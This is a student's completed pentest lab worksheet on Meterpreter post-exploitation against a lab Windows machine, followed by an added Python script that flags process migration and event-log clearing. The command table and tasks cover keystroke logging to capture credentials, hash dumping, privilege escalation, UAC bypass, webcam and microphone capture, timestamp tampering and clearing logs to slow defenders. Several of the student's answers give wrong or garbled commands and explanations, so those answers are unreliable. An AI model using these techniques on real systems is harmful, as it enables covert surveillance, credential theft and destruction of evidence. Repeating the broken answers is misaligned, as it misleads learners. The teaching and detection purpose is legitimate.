[Lab-Pentest] Post-Exploitation with Meterpreter

School: Madison Area Technical College, Madison
Course: 804-208
Subject: Information Systems
Date: Dec 6, 2023
Type: docx
Pages: 6
Uploaded by LavonCN

Getting started

Before starting this lab be sure to complete [LAB] Metasploit RAT. One of the goals in that lab is to build a malicious file that includes Meterpreter as a payload. In this lab, you will take a deeper dive into Meterpreter.

Meterpreter Fundamentals

The following outlines specific activities that can be performed when using Meterpreter. This is not an exhaustive list and you are encouraged to review the help provided in Meterpreter.

Common Commands

The following table identifies useful commands for post-exploitation activities. Each entry gives the command, its description, and an explanation of when to use it.

help - List available commands. Use this to review the available commands in Meterpreter. The list of available commands will change as you load more modules in the session.
migrate - Move from one process to another. Use this to migrate Meterpreter from the initial process to one that isn’t easily stopped.
getuid - Display the username. Use this to understand your current privilege level in the running Meterpreter shell.
getpid - Display the current process ID. Use this to know which process owns the Meterpreter shell.
ps - Display all of the processes running in memory. Use this to identify other targets to migrate to, or to understand what the user is doing.
getsystem - Get SYSTEM privileges in the target OS. Use this to gain more privilege than was initially granted during the exploit process.
kill - Kill a running process. Use this to kill a running process.
getprivs - Show the current privileges. This is distinct from getuid in that it shows privileges related to group memberships as well as user privileges.
sysinfo - Display system information. Use this to document interesting information about the target system.
timestomp - Alter timestamps. Use this to modify timestamps to slow blue team activities.
clearev - Clear Windows Event Logs. Use this to destroy event log data.
screenshot - Capture an image of the running desktop. Use this to ‘see’ what is happening on the desktop.
keyscan - Activate the keystroke logger. Use this to capture keystrokes being entered on the target system.
keyscan_dump - Dump the captured keystrokes. Use this to output the buffer of the keystroke logger.
record_mic - Begin capturing audio. Use this to capture audio using any microphone attached to the target device.
webcam_* - Commands to capture video. Use these commands to interact with a video capture device attached to the target system.
download - Download a file. Use this to download a file from the target system.
upload - Upload a file. Use this to upload a file to the target system.
cat - Display the contents of a file. This works exactly like the traditional cat(1) program on a UNIX system.
hashdump - Display the contents of the local credential store. Use this to capture any usernames and password hashes that are stored on the target system. This command requires you to have at least local admin privileges on the target system.
background - Send the Meterpreter shell into the background. Use this to return to the Metasploit interface (msfconsole) and enable the use of a post-exploitation module.
exit - Exit Meterpreter. Use this to exit the session. Meterpreter will also be scrubbed from memory.

Post Modules

The following table identifies useful POST modules in the Metasploit Framework, with each module’s name and purpose.

post/windows/smart_hashdump - A smarter version of ‘hashdump.’ This module can gather more information across a wider set of targets.
post/windows/gather/credentials/vnc - Used to gather credentials related to the VNC service.
post/windows/escalate/bypassuac - Used to bypass User Account Control in Windows. This module is semi-reliable.

Lab Activities

Using the Meterpreter session created in [LAB] Metasploit RAT and the references provided in this document, perform the following tasks.

1. List all of the current running processes.
   Command: ps

2. Search for just the “explorer” process.
   Command: search explorer
   Did you find it? yes
   Why or why not? it was just there

3. Get the current user account that you are logged in with.
   Command: getuid
   Username: student

4. Get the SID of the current user you are logged in as.
   Command: getsid
5. Grab the “sysinfo” from the target machine.
   Command: sysinfo

6. Take a screenshot of the currently logged-in user’s desktop.
   Command: screenshot
   What could we use this for, depending on what the user has open? to see files

7. Migrate your Meterpreter session into the “explorer.exe” process by name.
   Command: migrate explorer.exe
   What do we gain by migrating into this process? the gain is that we get to see whether the app is 64 bit.

8. List the current directory you are in on your LOCAL machine. (Read this carefully.)
   Command: lwpd
   Directory: C:\Users\student\documents

9. List the current directory you are in on the target machine.
   Command: ls
   Directory: C:\Users\student/downloads

10. Navigate to the current user’s desktop. (Note: this should be “C:\Users\Administrator.SECLAN\Desktop”.)
    Command: > run getgui -u username -p password

11. Use the “edit” command to create a text file on the user’s desktop. Name the file “HelloAdmin.txt” and put “Hello Windows User :)” as the text.
    Command: edit HelloAdmin.txt
    Can you open and read the file on the Windows 7 machine? yes

    As Meterpreter will use ‘vi’ as the default editor, a quick vi lesson is in order. Once the file is open, press the ‘i’ key to put the editor in “--INSERT--” mode. Now you can enter text. Once you are done editing, to save the file: <Esc><Shift>:wq

12. From Meterpreter, execute “notepad.exe” on the target machine, opening the text file that you just created on the Windows 7 desktop. Note: read the help for the execute command carefully, as you need to pass the filename as an argument.
    Command: executenotepad
    Did notepad open on the Windows 7 desktop? No

13. Upload a copy of the clean (non-trojan) version of putty to the victim’s Desktop. Note: if you do not still have the copy from the RAT lab, just download a new copy.
    Command: smbclient \\\\192.168.1.1\\c$ -U Administrator put putty.exe
    Can you put the “putty.exe” file on the Desktop of the currently logged-in user? (If not, go back and “try harder” LOL :) Yes

14. Kill the notepad process you just created by name (NOT BY PROCESS ID).
    Command: kill notepad

15. Grab the user’s login credentials when they use putty to ssh into the “webtarget” box. Hint: research the “keyscan_” commands. Note: you need to use PuTTY to connect to the “WebTarget” box in your lab environment from Windows 7 to generate the login info.
    Command: keyscan.start
    Screencap of credentials:

16. Dump all of the user credentials on the target system.
    Command: keyscan.dump
    What can you do with this information? use it to see what username the user is using.

17. Clear the event logs on the target system.
    Command: run event manager-c

Stretch Goal

1. Automate the whole process in an .rc file. NOTE: For step 11 in the lab, do not manually edit the file in your script. Just create the file on your Kali machine and then use your script to upload it.
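The command table describes clearev and timestomp as ways to slow blue team work, and step 7 migrates the session into explorer.exe. The Python triage routine below is an added example for the defender's side of that same sequence and is not part of the lab handout: it flags Windows Security event 1102 and System event 104 (a log was cleared) and Sysmon event 8 (CreateRemoteThread) into explorer.exe from an image outside C:\Windows, escalating when a log clear follows a suspected migration within a short window. The event records, timestamps and file paths are constructed sample data.

```python
"""Defender-side triage for the activity this lab walks through: a Meterpreter
session migrating into explorer.exe and then clearing the event logs.
Records below are constructed, not real telemetry; the field names follow the
Windows Security/System and Sysmon schemas."""

# Constructed sample events: (timestamp in seconds, channel, event id, fields).
SAMPLE_EVENTS = [
    (100, "Security", 4624, {"TargetUserName": "student"}),
    (130, "Microsoft-Windows-Sysmon/Operational", 8,
     {"SourceImage": r"C:\Users\student\Downloads\putty.exe",   # constructed path
      "TargetImage": r"C:\Windows\explorer.exe"}),
    (190, "Security", 1102, {"SubjectUserName": "Administrator"}),
    (191, "System", 104, {"Channel": "Application"}),
]

# Security 1102 = audit log cleared; System 104 = any other event log cleared.
LOG_CLEARED = {("Security", 1102), ("System", 104)}
TRUSTED_PREFIXES = ("c:\\windows\\",)

def is_log_cleared(channel, event_id):
    """True when the record is the Windows 'log cleared' audit event."""
    return (channel, event_id) in LOG_CLEARED

def is_suspect_remote_thread(channel, event_id, fields):
    """Sysmon 8 (CreateRemoteThread) into explorer.exe from an untrusted image
    is the footprint that `migrate explorer.exe` leaves in process telemetry."""
    if event_id != 8 or "Sysmon" not in channel:
        return False
    src = fields.get("SourceImage", "").lower()
    tgt = fields.get("TargetImage", "").lower()
    return tgt.endswith("\\explorer.exe") and not src.startswith(TRUSTED_PREFIXES)

def triage(events, window=300):
    """Return (severity, timestamp, message) findings in time order. A log clear
    within `window` seconds of a suspected migration is escalated to high,
    because together they match the sequence the lab performs."""
    findings, last_inject = [], None
    for ts, channel, event_id, fields in sorted(events, key=lambda e: e[0]):
        if is_suspect_remote_thread(channel, event_id, fields):
            last_inject = ts
            findings.append(("medium", ts, "possible process migration into explorer.exe"))
        elif is_log_cleared(channel, event_id):
            recent = last_inject is not None and ts - last_inject <= window
            sev = "high" if recent else "medium"
            findings.append((sev, ts, f"{channel} log cleared (event {event_id})"))
    return findings

if __name__ == "__main__":
    for sev, ts, msg in triage(SAMPLE_EVENTS):
        print(f"[{sev}] t={ts} {msg}")
```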